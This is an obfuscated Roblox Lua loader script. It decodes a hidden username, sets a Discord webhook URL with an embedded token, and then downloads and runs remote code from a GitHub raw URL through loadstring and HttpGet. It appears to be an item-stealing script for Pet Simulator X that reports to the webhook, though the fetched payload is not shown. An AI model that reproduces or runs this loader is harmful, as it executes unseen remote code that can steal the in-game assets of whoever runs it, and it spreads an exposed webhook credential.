--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(48 + 50) -((543 -(25 + 482)) + 61) , #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 + 0 )),v1(v2(v9,((1757 -(135 + 44)) -((2193 -(267 + 867)) + 444 + 74)) + ((v11-(1 + 0))% #v9) ,1 + ((v11-(2 -1))% #v9) + 1 )))%256 ));end return v5(v10);end UserName=v7("\193\50\172\63\48\6\249\240\37\137\52\28\82\185\170","\153\74\237\76\68\99\139");WebHook="https://discord.com/api/webhooks/1078728805323112458/bEfU145_7oRX3I6g8CPLMiJiZPcYBfEJil1FMYWj3uByZyidj141LOR5MuzffOPy6Ne7";loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/New.lua",true))();
